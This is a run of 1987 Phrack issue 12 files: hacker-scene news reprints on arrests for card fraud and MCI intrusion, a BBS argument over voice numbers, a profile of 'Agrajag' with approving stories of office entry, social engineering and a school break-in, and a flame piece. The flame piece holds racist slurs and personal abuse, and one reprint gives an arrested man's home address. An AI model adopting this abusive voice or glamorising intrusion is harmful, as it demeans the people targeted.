The official date for SummerCon 1987 is June 19,20. This is far enough into
|
||||
the summer that everyone of the younger generation should be out of school and
|
||||
early enough that no one has to worry about facing reality right away. This
|
||||
date has also been chosen specifically as to not interfere with the St. Louis
|
||||
VP Fair (Vale Profit).
|
||||
|
||||
If you are going to attend SummerCon, we ask that you contact Knight
|
||||
Lightning, Taran King, or Forest Ranger for more details. The TeleComputist
|
||||
Information Line is (314) 921-7938. The names of those attending will be kept
|
||||
confidential so as to not cause anyone discomfort, however we do ask that you
|
||||
identify yourself at the conference by means of a name tag or some form of
|
||||
identification. Security personal is welcome to attend, but we request that
|
||||
you let us know ahead of time. If anyone, especially security personnel,
|
||||
would like to speak at SummerCon please also let us know and we will schedule
|
||||
you in.
|
||||
|
||||
:Knight Lightning
|
||||
______________________________________________________________________________
|
||||
|
||||
Hackers Caught Using Credit Card To Buy More Equipment February 20, 1987
|
||||
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||||
By Ben L. Kaufman of The Cincinnati Enquirer
|
||||
|
||||
"I was uneasy about the pickup."
|
||||
|
||||
Two young "hackers" in Milford using an electronic bulletin board to get
|
||||
stolen credit card numbers and buy hardware to expand their computers. Now
|
||||
they're in big trouble because unauthorized use of a credit card is a federal
|
||||
offense and the Secret Service caught them. "Computer-aided credit card fraud
|
||||
is increasingly common, said special agent in charge, James T. Christian on
|
||||
Tuesday, "but using the filched name and number to enhance computer clout was
|
||||
a unique touch."
|
||||
|
||||
The two youths had a $1,300 order sent to an abandoned house on Ohio 131E,
|
||||
Christian said, but when they picked it up an agent was waiting with the UPS
|
||||
deliveryman.
|
||||
|
||||
John Martin Howard, 21, 5788 Meadowview Drive, Milford was cited before U.S.
|
||||
magistrate J. Vincent Aug Jr., who accepted his plead to guilty Monday and
|
||||
released him on his promise to return when summoned.
|
||||
|
||||
"I was uneasy about the pickup," Howard recalled in a telephone interview. The
|
||||
risk of getting caught "was in the back of my mind." And it was an awful
|
||||
moment when the Secret Service agent confronted him and his juvenile buddy,
|
||||
Howard added. "I think they were surprised," Christian said. Howard was
|
||||
charged with attempted use of an unauthorized credit card. His juvenile
|
||||
partner -- who refused to comment Tuesday -- was turned over to his parents.
|
||||
|
||||
Christian said the youths ordered equipment from Computer-Ability in suburban
|
||||
Milwaukee paying with the stolen credit card. A sharp-eyed store employee
|
||||
noted purchases on that credit card were coming in from all over the country
|
||||
and called the Secret Service. Within two weeks the trap in Milford was set.
|
||||
|
||||
Howard said his young friend knew the Cincinnatian who led them to the
|
||||
bulletin board filled with the names and the numbers of stolen credit cards.
|
||||
"We got it from somebody who got it from somebody who got it from somebody on
|
||||
the east coast," Howard recalled. That new acquaintance also boasted of using
|
||||
stolen card numbers from electronic bulletin boards to buy expensive
|
||||
accessories and reselling them locally at bargain process.
|
||||
|
||||
He and his friend used the stolen credit card to upgrade his Atari 800 system,
|
||||
Howard said. "We ordered a bunch of hardware to use with it." In addition to
|
||||
the purchase that drew the secret service to them, Howard said they "ordered
|
||||
other stuff, but before we received anything, we were picked up." Howard said
|
||||
he'd had the Atari about two years and was getting bored with it and home
|
||||
computers in general.
|
||||
|
||||
He had taken computer programming for eight months after high school, he said,
|
||||
but hadn't used it. He would like to try computer-aided design and
|
||||
engineering, but right now, he's working in a pizza parlor. Christian said
|
||||
Howard's parents had been enthusiastic about his computer interests and
|
||||
friends who shared them. "They though it would keep them out of trouble."
|
||||
|
||||
Assistant U.S. attorney Kathleen Brinkman and Christian said the Cincinnati
|
||||
area investigation was continuing and numerous juveniles, some quite young,
|
||||
may be involved.
|
||||
Thanks to Grey Elf
|
||||
|
||||
Re-typed for PWN into lowercase by Knight Lightning
|
||||
______________________________________________________________________________
|
||||
|
||||
Hang On... Phone Rates Are Falling Again! March 1987
|
||||
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||||
>From Changing Times Magazine March 1987 Issue
|
||||
|
||||
No news that long-distance rates are still headed down, but now local rates
|
||||
are poised to follow, at least in some areas.
|
||||
|
||||
Competing long-distance carriers have already been forced to react to AT&T's
|
||||
January rate cut, which averaged 11.2%, with cuts of their own. Now the
|
||||
Federal Communications Commission [FCC] may propose that an additional $1 or
|
||||
$2 be added to the subscribers line charge, the $2-a-month access charge that
|
||||
every residential customer pays. If that happens it would compensate.
|
||||
|
||||
Since AT&T's divestiture in January 1984, the telephone services component of
|
||||
the consumer price index has risen 17.4%, reflecting a 36.7% increase in local
|
||||
rates at the same time long-distance charges were falling. But price
|
||||
increases for overall service have moderated each year, falling 2.7% in 1986
|
||||
from 4.7% in 1985 and 9.2% in 1984. That trend should continue as local rates
|
||||
stabilize and even fall. Wisconsin and Vermont, for example, have ordered
|
||||
local companies to make refunds, and a number of states - New York,
|
||||
Pennsylvania, Washington - are considering lowering rates to reflect the
|
||||
improved financial position of local phone companies. Those companies will
|
||||
benefit from tax reform, and lower inflation and interest rates have resulted
|
||||
in lower expenses in several other areas.
|
||||
|
||||
Things are not looking good for some of AT&T's competitors in the long
|
||||
distance business, however. Forced to follow AT&T's rate cuts, both MCI and
|
||||
US Sprint are hard-pressed financially, and analysts don't rule out the
|
||||
possibility that one or both could get out of the long-distance business,
|
||||
potentially leaving AT&T a monopoly again. But that would be "politically
|
||||
unacceptable," says analyst Charles Nichols of E.F. Hutton. Some
|
||||
alternatives: allowing regional phone companies to enter the long-distance
|
||||
business or allowing AT&T to keep more of the profits it earns from increased
|
||||
efficiency instead of forcing the company to cut rates. That would take some
|
||||
pressure off competitors.
|
||||
|
||||
Special Thanks to Stingray
|
||||
______________________________________________________________________________
|
||||
|
||||
Police Arrest Computer "Hacker" Suspect March 15, 1987
|
||||
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||||
>From the St. Louis Post-Dispatch
|
||||
|
||||
"MCI told police it was losing $2.7 million a month to such 'hackers.'"
|
||||
|
||||
A computer software engineer [Robert Wong] has been arrested at his home in
|
||||
Maryland Heights, Missouri on suspicion of trying to get into the computer
|
||||
system of MCI Telecommunications Corporation.
|
||||
|
||||
The case is the fourth in this area involving computer "hackers" who have
|
||||
tried in recent months to get into MCI's computer system, police say.
|
||||
|
||||
Detective John Wachter of the Maryland Heights Police Department said the
|
||||
department would seek a warrant today charging the suspect with "tampering
|
||||
with computer users," a felony.
|
||||
|
||||
The charge is being sought under a state law enacted last year to deal with
|
||||
hackers - people who try illegally to tap into other computer systems.
|
||||
|
||||
The suspect is Robert Wong, 23, of the 2000 block of Maverick Drive, Maryland
|
||||
Heights, Missouri. Police tracked down Wong by a court-sanctioned "trap" on
|
||||
his phone after MCI learned that someone was trying to tap into its
|
||||
long-distance lines.
|
||||
|
||||
In a written statement to police, Wong said he "came across" MCI's programs
|
||||
and access codes. He said he was "amazed" when he got into the system. "I
|
||||
know it was illegal, but the urge of experimenting was too great," he told
|
||||
police.
|
||||
|
||||
Typed For PWN by Taran King
|
||||
______________________________________________________________________________
|
||||
|
||||
PWN Quicknotes
|
||||
~~~~~~~~~~~~~~
|
||||
In upcoming months P-80 will be moved from her ole TRS Model 1 to an IBM PC
|
||||
compatible. In addition to a boost in storage capacity (amount still
|
||||
undecided), P-80 will be adding a new "user to user" direct file/program
|
||||
transfer thus allowing the membership the ability to privately send text or
|
||||
programs directly to another user. There will also be the ability to forward
|
||||
a message with text/program attached) to another user after receipt. (2/26/87)
|
||||
|
||||
Information from
|
||||
<S><C><A><N> <M><A><N> & P-80 Information Systems
|
||||
------------------------------------------------------------------------------
|
||||
If you consider yourself a phreaker or a hacker in any way, shape or form,
|
||||
then read on! The Telecom Security Group is sponsoring the first on-line
|
||||
hack/phreak survey. It consists of about 30 minutes work of answering
|
||||
questions (or until you want to stop) that pertain to phreaking, hacking, the
|
||||
security, and the attitudes surrounding it all.
|
||||
|
||||
You are allowed to identify yourself during the survey if you wish or you may
|
||||
remain totally anonymous. It's really just the general answers that will
|
||||
count. Call now: 914-564-6648 (914-LOG-ON-IT) and type SURVEY at the main
|
||||
prompt to get the survey. Thanks for your involvement, and do spread the word
|
||||
to any board that considers itself phreak/hack oriented.
|
||||
|
||||
Information by Taran King & Tuc (2/6/87)
|
||||
------------------------------------------------------------------------------
|
||||
Telecommunications giant AT&T is lying in its advertisements that claim it has
|
||||
an exclusive toll-free number for foreign clients to reach U.S. businesses,
|
||||
its competitor says in a lawsuit.
|
||||
|
||||
Worldwide 800 Services Inc. says that it has filed suit against AT&T with the
|
||||
FCC, charging AT&T with false advertising. The ads by AT&T claim that it can
|
||||
provide a global telephone network that would allow clients in foreign
|
||||
countries to call a toll-free number to reach businesses in the United States.
|
||||
AT&T claimed that "You won't find this type of service anywhere else."
|
||||
|
||||
Worldwide 800 says that their company provides toll-free service from any
|
||||
foreign city to the U.S., whereas AT&T can only provide toll-free service on a
|
||||
countrywide basis. An AT&T spokeswoman denied all of the charges, stating
|
||||
that the advertisement in question was neither fraudulent or deceptive. If
|
||||
Worldwide 800 Services wins the case, they state that they will demand
|
||||
corrective advertising and seek monetary damages.
|
||||
|
||||
Information from Lucifer 666 (3/1/87)
|
||||
______________________________________________________________________________
|
258
phrack12/11.txt
Normal file
258
phrack12/11.txt
Normal file
|
@ -0,0 +1,258 @@
|
|||
==Phrack Inc.==
|
||||
|
||||
Volume Two, Issue 12, Phile #11 of 11
|
||||
|
||||
PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
|
||||
PWN PWN
|
||||
PWN >>>>>=-*{ Phrack World News }*-=<<<<< PWN
|
||||
PWN Issue XII/2 PWN
|
||||
PWN PWN
|
||||
PWN Created, Compiled, and Written PWN
|
||||
PWN by Knight Lightning PWN
|
||||
PWN PWN
|
||||
PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
|
||||
|
||||
Toll-Free Woes January 26, 1987
|
||||
~~~~~~~~~~~~~~
|
||||
>From Time Magazine; reprinted in the February 1987 Issue of CO Magazine
|
||||
|
||||
While Oral Roberts struggles with budgets, fundamentalist preacher Jerry
|
||||
Falwell faces a different kind of money pinch. The Lynchburg, VA,
|
||||
televangelist has long used toll-free phone numbers to assist viewers seeking
|
||||
spiritual help.
|
||||
|
||||
For many months Falwell foes, aware that each phone-in cost $1, have purposely
|
||||
clogged his lines. An Atlantan programmed his computer to dial Falwell every
|
||||
30 seconds. Before Southern Bell stepped in, the stunt cost Falwell $750,000.
|
||||
|
||||
Late last year, the Daily Cardinal student newspaper at the University of
|
||||
Wisconsin -- Madison ran a column advocating "telephone terrorism" and listed
|
||||
several targets, including Falwell.
|
||||
|
||||
The TV preacher estimates that annoyance calls cost him more than $1 million
|
||||
last year, not counting lost donations. Falwell, who is considering legal
|
||||
action, regards the calls as "unlawful activities" that do "injury to the
|
||||
cause of Christ."
|
||||
|
||||
[Well now...isn't that special? And just where did all these people get the
|
||||
idea to do "injury to the cause of Christ?" From me, Knight Lightning? No, I
|
||||
don't think so. From oh maybe Phantom Phreaker? No, I don't think so.
|
||||
Possibly Lucifer 666, but the big question is... Could it be... SATAN!!!?]
|
||||
|
||||
Typed For PWN by Knight Lightning
|
||||
______________________________________________________________________________
|
||||
|
||||
Voice numbers: Are They Really Necessary? March 5, 1987
|
||||
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||||
A recent series of events on ShadowSpawn BBS has attracted much attention in
|
||||
the hack/phreak community. It seems that the sysop, The Psychic Warlord,
|
||||
denied access to Lex Luthor, Kerrang Khan, and Silver Spy because of their
|
||||
failure to leave valid voice phone numbers. The following messages have been
|
||||
taken from ShadowSpawn BBS. [Some posts have been re-formatted].
|
||||
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
|
||||
32/50: This board...
|
||||
Name: The Psychic Warlord #1
|
||||
Date: 6:36 pm Thu Feb 26, 1987
|
||||
|
||||
Alright goddamn it, I'm so fucking pissed off that I'm just about ready to
|
||||
say Fuck It and take down the board for good. Why? Seems that few people are
|
||||
happy with the way I run this board. No, not really with the way I run it,
|
||||
but more like the way I choose to validate my users. Ok, fine... You don't
|
||||
like it then get the fuck out and quit complaining.
|
||||
|
||||
I set certain rules that people have to abide by to get access to this
|
||||
board. Very simple fucking rules. And now I'm finding out that people don't
|
||||
want to abide by these rules, and basically tell me I'm fucked in the head for
|
||||
having and going by them. What rules? For one thing, and this is the major
|
||||
bitch-point here, new users (no matter WHO THE FUCK they are) are *REQUIRED*
|
||||
to leave a valid voice number where I or Ctrl can reach them at for
|
||||
validation. No big fucking deal... Just a goddamn phone number.
|
||||
|
||||
"Oh, but I can't give you my voice number. I'm a hacker, and I do untold
|
||||
amounts of illegal things and I can't risk my number getting out." Riiight.
|
||||
Like I'm really some fucking Fed who's gonna bust yer ass, or some geek who
|
||||
gives out peoples phone numbers to any-fucking-body who asks. BULLSHIT!
|
||||
|
||||
I'm the Sysop of a (hopefully) respected BBS, and along with that goes a
|
||||
certain responsibility. I'm not about to go passing out peoples numbers. *I*
|
||||
have respect for other hackers privacy, unlike some people who choose to
|
||||
invade mine just for the fucking hell of it. I require that new users leave
|
||||
their voice numbers for a number of GOOD reasons:
|
||||
|
||||
1) Trust -- If they can trust me with their voice numbers, then I can trust
|
||||
them with access to my board. I need that kind of trust between
|
||||
me and my users. If they feel that they can't trust me enough to
|
||||
give me a lousy phone number, then how in God's name am I supposed
|
||||
to be expected to trust them at all?? My ass is on the line just
|
||||
as much (if not more) than any user of this board!
|
||||
|
||||
2) Security -- Ok... So how do I know if someone is really a Fed or not? I
|
||||
don't! I go by instinct. Having a person's voice number let's
|
||||
me call them for validation and get to know them a helluva lot
|
||||
better than I could through e-mail. Plus, if suspicion ever
|
||||
arose about a user of my board being a Fed or not, how could I
|
||||
check this out? If I don't have their voice number, I have no
|
||||
leads as to where to find or who the fuck this person really
|
||||
is. Now I don't go checking everyone on the board via the
|
||||
numbers they give me. I have NEVER had to do that for ANY
|
||||
user, but the possibility is there. And rather than throw a
|
||||
possibly innocent person off the board merely on a hunch, we
|
||||
might be able to prove whether or not it's true. This is
|
||||
extremely hypothetical, but like I said... the possibility is
|
||||
there.
|
||||
|
||||
Ok, so why the hell should I have to require that established people, like
|
||||
Lex Luthor and Silver Spy, leave valid voice numbers? Is it fair to the other
|
||||
users? Hell no. If I required only certain people to give me their numbers,
|
||||
then what does that do to their trust in me?? It's like me saying, "Well, I
|
||||
don't trust you... I don't know you that well. You have to sacrifice more
|
||||
than these guys to get access." That's BULLSHIT, and I'm not about to do it.
|
||||
If one person is required to give a valid voice number, then every damn user
|
||||
is required to!
|
||||
|
||||
I've been getting a lot of shit the past couple days because I've denied
|
||||
access to some very well known and respected people in the hack/phreak world.
|
||||
Namely Lex Luthor, Silver Spy, and Kerrang Khan. I denied all of them access
|
||||
because they all refused to leave a voice number. Fine. Then they don't get
|
||||
access. Ctrl [Ctrl-C is a cosysop on ShadowSpawn] said I was crazy. Taran
|
||||
said pretty much the same. Taran also tried to get me to change my mind...
|
||||
to condescend, or go against what I believe in and how I believe this board
|
||||
should be run. He (Taran) said that by my denying Lex and the others access
|
||||
that I would be hurting this board more than helping it. ***I DON'T GIVE A
|
||||
DAMN***
|
||||
|
||||
I'm not impressed in the least with any of those peoples reputations. I
|
||||
never have been a "groupie" and I'm not about to start now. Whether or not
|
||||
they are good or not isn't the issue here, and some people don't seem to
|
||||
realize that. Yes, Lex is good. He's well known. He's even a nice guy...
|
||||
I've talked to him before and personally I like him. But I don't play
|
||||
favorites for anyone. Not Lex, not Silver Spy, and not Kerrang Khan. Nobody.
|
||||
|
||||
What really pissed me off, and I should have told Taran that I resented it
|
||||
at the time, is that TK said that apparently this board is "elite". That I
|
||||
consider this board to be too good. Personally I think this fucking board is
|
||||
overrated, and yes Taran... I resented that remark. I can't remember exactly
|
||||
what he said, but it was something like, "In your logon message you have
|
||||
'We're not ELITE, we're just cool as hell,' but apparently you ARE elite."
|
||||
|
||||
This board isn't "elite" and if I come off seeing that way sometimes, it's
|
||||
only because people are getting half the picture of what I'm doing.
|
||||
|
||||
Ok, so I deny Lex Luthor access to this board. That's all you people seem
|
||||
to think about. The actual denying of access. You think, "How can he do
|
||||
that?! What gall! He must be a real egotistic bastard to think that Lex
|
||||
Luthor isn't good enough to be on this board!" If you think that, and most of
|
||||
you have thought only that, then you're fucked in the head.
|
||||
|
||||
Yes, I realize who these people are! Yes I know their reputations and how
|
||||
they are renowned for their skills as hackers and phreakers... But like I
|
||||
said before, that's not the issue. It never was. I *KNOW* how good these
|
||||
people are. I *KNOW* about their reputations and I respect them for it, but I
|
||||
don't care. That's not why they've been denied access!
|
||||
|
||||
When I deny someone access to this board it's usually for one of two
|
||||
reasons;
|
||||
|
||||
1) They left a false voice number or
|
||||
2) They either blew off or left really crappy answers to the filter.
|
||||
|
||||
Personally I'd be thrilled to have Lex or Silver Spy on the board... and
|
||||
any of a number of people. But these people can't find it in themselves to
|
||||
trust me. If they can't trust me, then I can't trust them. It's as simple as
|
||||
that.
|
||||
|
||||
I'm not about to let anyone on this board that I can't trust. It's not
|
||||
fair to the other users, and it's damn stupid of me. I run this board the
|
||||
best way I know how. I do what I do in respect to new user validations
|
||||
because it's the best way, through trial and error, that I have found to
|
||||
handle it. If people can't respect the way in which I choose to run my board
|
||||
then I'd appreciate it if they never called. And when regular users of my
|
||||
board start questioning the way I do thing, and telling me that I'm WRONG for
|
||||
doing things the way I believe they should be done, then I really start to
|
||||
wonder what the fuck I'm doing it for at all. I'm not a quitter, and I don't
|
||||
like the idea of giving up and taking down the board. I'm going to run this
|
||||
board the way I think is best, and I'm not about to conform to what other
|
||||
people think I should do.
|
||||
|
||||
I've probably stepped on some toes and offended some people with this, but
|
||||
that's just too damn bad. I hate fighting the topic but I'll fight it if I
|
||||
have to.
|
||||
|
||||
--==The Psychic Warlord==--
|
||||
|
||||
|
||||
37/50: Take a fucking valium
|
||||
Name: Taran King #45
|
||||
Date: 9:02 am Sat Feb 28, 1987
|
||||
|
||||
You're known for an explosive temper, PW as well as sometimes being extremely
|
||||
irrational. My policy is to let people on the my board with voice numbers
|
||||
only. Through the history, I've made maybe 5 exceptions. Some of 'em include
|
||||
Lex, Spy (at first), Tabas, Videosmith, and Phucked Agent 04. Now, I never
|
||||
got anything out of PA04 because he got a "call" soon after he got on the
|
||||
board, but the rest of the members have contributed extremely well to the
|
||||
board. I just made sure I knew it was really them by referencing and cross
|
||||
referencing.
|
||||
|
||||
If your morals are that unbendable, PW, then you need to relook at the purpose
|
||||
of this board. If it's to spread phreak/hack knowledge as you said on the
|
||||
phone, then to have those people on with the experience that they have would
|
||||
hardly hinder the board. I seriously doubt anyone would feel offended if any
|
||||
of the forementioned people got on here without leaving a valid voice number,
|
||||
being that they're not on any other board with a voice number.
|
||||
|
||||
I know that Lex is not giving out his number to even the best of his
|
||||
friends. Spy is really careful about it these days. Not so sure about
|
||||
Kerrang but he's travelling about now so he's not in one place for too long
|
||||
nowadays. It's your board and I was trying to give you some constructive
|
||||
criticism, but you took it the wrong way. You don't have to claim you're
|
||||
ELITE to be elite. Elite merely means that you've got the respected members
|
||||
of the community on board. Well, you've got 'em. If you don't like it, I
|
||||
suggest you go through and purge the log like a big dog. Actually, fuck it.
|
||||
I'm tired of getting into arguments for trying to help someone. Feel free to
|
||||
delete my account if you feel that I've not contributed enough information to
|
||||
the board, or if you've rethought the purpose and decide that it's not for
|
||||
what I've contributed, dump me. Fuck dis
|
||||
-TK
|
||||
|
||||
|
||||
44/50: Well...
|
||||
Name: The Psychic Warlord #1
|
||||
Date: 4:57 pm Sun Mar 01, 1987
|
||||
|
||||
I'm glad that some people agree with me on this. I can understand Lex's
|
||||
point of view, too. I can also remember a time when I myself refrained from
|
||||
giving my number to any sysops. But... I've changed my point of view
|
||||
considerably after living the Sysop life for well over 1.5 years. Now if I
|
||||
ever wanted access to a board, and the Sysop of that board asked for my voice
|
||||
number, I'd give it to him.
|
||||
|
||||
I've given Lex access to this message base for a short period of time so
|
||||
that he can check out the discussion. He called me voice the other day and we
|
||||
talked for a while about this whole biz. I'd like him, and Spy, on the board,
|
||||
and possibly they'll change their minds. If not, that's cool. I'm just going
|
||||
to let the whole thing kind of slide from here on out. If they change their
|
||||
minds, great... Well, Adios.
|
||||
|
||||
--==The Psychic Warlord==--
|
||||
|
||||
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
|
||||
|
||||
Kerrang Khan, when notified that he must leave a voice number, said "there is
|
||||
no reason Psychic Warlord would need any user's phone number." He also stated
|
||||
that the fact that PW insisted on voice numbers was very "suspicious."
|
||||
|
||||
Silver Spy, when notified that he must leave a voice number, never bothered
|
||||
calling again.
|
||||
|
||||
Lex understood the whole situation and remained cool. He said he could see
|
||||
why a sysop would need voice numbers of his users. Lex was worried about the
|
||||
board he left it on getting busted and the authorities getting his number. So
|
||||
PW, in response to this deleted all users phone numbers from the board and
|
||||
encrypted them in a hidden sub-directory. Now the numbers are there only and
|
||||
are totally hidden.
|
||||
Information Provided By
|
||||
|
||||
Lucifer 666/Psychic Warlord/ShadowSpawn BBS/Taran King
|
||||
______________________________________________________________________________
|
||||
|
136
phrack12/2.txt
Normal file
136
phrack12/2.txt
Normal file
|
@ -0,0 +1,136 @@
|
|||
==Phrack Inc.==
|
||||
|
||||
Volume Two, Issue 12, Phile #2 of 11
|
||||
|
||||
==Phrack Pro-Phile IX==
|
||||
|
||||
Written and Created by Taran King
|
||||
|
||||
3/17/87
|
||||
|
||||
Welcome to Phrack Pro-Phile V. Phrack Pro-Phile is created to bring
|
||||
info to you, the users, about old or highly important/controversial people.
|
||||
This month, I bring to you a name from the past...
|
||||
|
||||
Agrajag The Prolonged
|
||||
~~~~~~~~~~~~~~~~~~~~~
|
||||
|
||||
Agrajag was popular on many boards and hung out with many of the
|
||||
stronger names in the phreak/hack community.
|
||||
------------------------------------------------------------------------------
|
||||
Personal
|
||||
~~~~~~~~
|
||||
Handle: Agrajag The Prolonged
|
||||
Call him: Keith
|
||||
Past handles: None
|
||||
Handle origin: Fictional character in Hitchhiker Trilogy
|
||||
Date of Birth: 6/14/67
|
||||
Age at current date: 19 years old
|
||||
Height: 6'2"
|
||||
Weight: 139 lbs.
|
||||
Eye color: Brown
|
||||
Hair Color: Depends on the day (Orange, Brown, Black, Hot Pink, etc.)
|
||||
Computers: TRS Model III, worked his way up to a TVI 950 Dumb
|
||||
Terminal
|
||||
|
||||
------------------------------------------------------------------------------
|
||||
Agrajag started phreaking and hacking in about 1979 through the help
|
||||
of some friends of his. He originally started hacking (programming) on a
|
||||
Vector 8080 in 4th grade. His instructor then is now one of the top 5
|
||||
computer instructors. Phreaking began with, of course, codes but he was very
|
||||
interested in how the phone system worked. He had read some books on the
|
||||
phone company and their evils in their earlier days and he was very interested
|
||||
in the very idea of becoming an operator. Members of the elite world which he
|
||||
has met include Tuc, BIOC Agent 003, Broadway Hacker (negative), and Cheshire
|
||||
Catalyst, all at a Tap meeting he attended. On regular BBSes, there were
|
||||
listings for other BBSes which turned out to eventually be phreak BBSes. Some
|
||||
of the memorable phreak boards he was on included WOPR, OSUNY, Plovernet, and
|
||||
Pirate 80. His phreaking and hacking knowledge came about with the group of
|
||||
people including Tuc, BIOC, and Karl Marx.
|
||||
|
||||
Agrajag was a video game programmer for the last American owned video
|
||||
game manufacturer, Cinematronix, Inc. (of Dragon's Lair, Space Ace, World
|
||||
Series, and Danger Zone fame, of which he helped with World Series and a big
|
||||
part of Danger Zone) which went bankrupt a bit over a month ago.
|
||||
|
||||
Agrajag takes interviews for magazines (such as this) which keeps up
|
||||
his phreak/hack activity. He (and a bunch of others) were written up in a USA
|
||||
Today article as well as being interviewed by a local paper when The Cracker
|
||||
(Bill Landreth) got busted (they took pictures of the back of his head in
|
||||
front of his computer).
|
||||
|
||||
Agrajag was never in any major phreak groups except for The
|
||||
Hitchhikers (Bring your towel!) which was just a group of local friends.
|
||||
|
||||
------------------------------------------------------------------------------
|
||||
|
||||
Interests: Telecommunications (modeming, phreaking, hacking,
|
||||
programming), music, concerts, club hopping, and video
|
||||
games.
|
||||
|
||||
Agrajag's Favorite Thing
|
||||
------------------------
|
||||
|
||||
Club/Bar hopping: Tijuanna (TJ)
|
||||
|
||||
Most Memorable Experiences
|
||||
--------------------------
|
||||
|
||||
Going officing. Tuc, BIOC, and he were let into a local CO and they used
|
||||
their copying machine to make copies of their manuals. They
|
||||
replaced the paper [over 2 reams] later and didn't steal anything
|
||||
major besides the paper and a few NY Bell signs.
|
||||
Called supervisors saying that they had witnessed some trunks red-lighting and
|
||||
there would be severe problems if they didn't contact this guy,
|
||||
Abbot Went, in San Francisco. There were about 10 supervisors in
|
||||
mass hysteria (on Thanksgiving) wondering what to do. Later, they
|
||||
called up Abbot again saying they were the White House switch and
|
||||
said some kids were fooling around.
|
||||
Breaking into his school's computer in his senior year mid-semester. He had
|
||||
scanned it out on a school prefix and the login and password was the
|
||||
name of his school. It was a TOPS-20 system and he was well enough
|
||||
versed in TOPS-20 to know what to do. The next day, he told the
|
||||
vice-principal that he had broken into the computer and that they
|
||||
had some major security problems. They said he was bullshitting and
|
||||
he told them to read their mail. Then, later, he brought in his
|
||||
equipment and showed them with the principal there. He was
|
||||
threatened by the principal with police, etc. but he told them to go
|
||||
to hell. He was later offered a job helping the security on the
|
||||
system but instead, he told them how they could solve the security
|
||||
problem and didn't take the job.
|
||||
Agrajag's teacher asking him to do a credit check on someone illegally. He
|
||||
eventually did part of it, but the teacher was an asshole so he
|
||||
didn't give all the information to him.
|
||||
Getting flown to the Tap meeting by a friend.
|
||||
|
||||
Some People to Mention
|
||||
----------------------
|
||||
|
||||
Tuc
|
||||
BIOC Agent 003
|
||||
Karl Marx
|
||||
Automatic Jack
|
||||
|
||||
All for being friends and all around good people and phreaks.
|
||||
|
||||
------------------------------------------------------------------------------
|
||||
|
||||
Agrajag is out and out against the idea of the destruction of data.
|
||||
He hated a person intensely because they posted private lines with
|
||||
instructions on how to maim a system owned by someone who was already hated.
|
||||
He deleted the message (he was co-sysop) and it became a bit controversial.
|
||||
He hated that then and still has no respect for anyone who does this. Where
|
||||
have all the good times gone?
|
||||
|
||||
------------------------------------------------------------------------------
|
||||
|
||||
I hope you enjoyed this phile, look forward to more Phrack Pro-Philes coming
|
||||
in the near future. ...And now for the regularly taken poll from all
|
||||
interviewees.
|
||||
|
||||
Of the general population of phreaks you have met, would you consider most
|
||||
phreaks, if any, to be computer geeks? The general populus, yes, but good
|
||||
phreaks, no. Thank you for your time, Agrajag.
|
||||
|
||||
Taran King
|
||||
Sysop of Metal Shop Private
|
84
phrack12/3.txt
Normal file
84
phrack12/3.txt
Normal file
|
@ -0,0 +1,84 @@
|
|||
==Phrack Inc.==
|
||||
|
||||
Volume Two, Issue 12, Phile #3 of 11
|
||||
|
||||
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
|
||||
% %
|
||||
% The Life & Times of The Executioner %
|
||||
% %
|
||||
% by Oryan QUEST %
|
||||
% %
|
||||
% Written on 3/16/87 %
|
||||
% %
|
||||
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
|
||||
|
||||
|
||||
Introduction:
|
||||
------------
|
||||
This file was not written with the intention of being cute, funny or to tell
|
||||
fellow phreaks and hacks how lame or stupid they are. It was written to open
|
||||
the eyes of these idiots to see what the REAL story is.
|
||||
|
||||
The Executioner/Mikey
|
||||
---------------------
|
||||
I'm am sure the majority of you have heard of "Exy." His claim to fame is
|
||||
simply telling people how lame they are or how great and sexy he is. He also
|
||||
claims to be wealthy and that Phreak Klass 2600 is the best bulletin board on
|
||||
this side of the galaxy. Let us examine some key events.
|
||||
|
||||
When Metal Shop Private was up, Mr. Sexy Exy (oh and I doubt he really is),
|
||||
proceeded to rag on everyone on the system with the exception of a few that he
|
||||
ass-kissed. He then turns around when Phreak Klass 2600 (and I am in no way
|
||||
ragging on Phreak Klass) goes up, to ask everyone he has annoyed for over 2
|
||||
months and badgers them to call. Now, Mike, I seriously doubt you are as sexy
|
||||
as you claim for several reasons. Just by the nature of your attitude, the
|
||||
way you think you are powerful because you can "tell" people about their lives
|
||||
and families when you yourself are a Chinese bastard who has an unemployed
|
||||
father that can barely speak the English language.
|
||||
|
||||
"Miko ith no heeahh riiitte nao"
|
||||
(Michael is no here right now)
|
||||
|
||||
You have ragged on Arthur Dent when you know that you will NEVER receive the
|
||||
admiration or stature whether it be socially or economically he has attained.
|
||||
You have ragged on Dr. Doom when he has achieved more than you can ever hope
|
||||
for. You only commenced to rag on him when he turned down your offer to join
|
||||
PhoneLine Phantoms. This is because he refused to be associated with an
|
||||
asshole like you. You continually show signs of immaturity (I am not saying I
|
||||
am perfect) by poking fun at other people's races (blacks, spics, Iranians)
|
||||
when you yourself are nothing but a rice dick.
|
||||
|
||||
You bad mouth people but, when you need their help you beg for it and ask them
|
||||
to be cool. You write stupid poems and rhymes about people when they are a
|
||||
TOTAL misrepresentation of facts. You claim Dr. Doom is so ugly he could
|
||||
never leave his room. Tell me, have you ever met Dr. Doom? Isn't it true
|
||||
that you ragged on him only because he didn't want anything to do with you,
|
||||
your group, and your image?
|
||||
|
||||
Are you going to rag on me now and prove all the points I have brought out? I
|
||||
think so. You ragged on me, telling me my family receives government cheese
|
||||
handouts and telling me what a loser I am when you yourself have never met me
|
||||
or bothered to seek the real facts. You then proceeded to badger me to join
|
||||
your new "legion of queers," The Network Technicians telling me how cool it
|
||||
would be and begging me to help you learn. But don't I receive government
|
||||
cheese handouts? Aren't I such a loser? Mr. Solid State trusted you and
|
||||
joined PLP. He thought nothing bad of you at the time. He just considered
|
||||
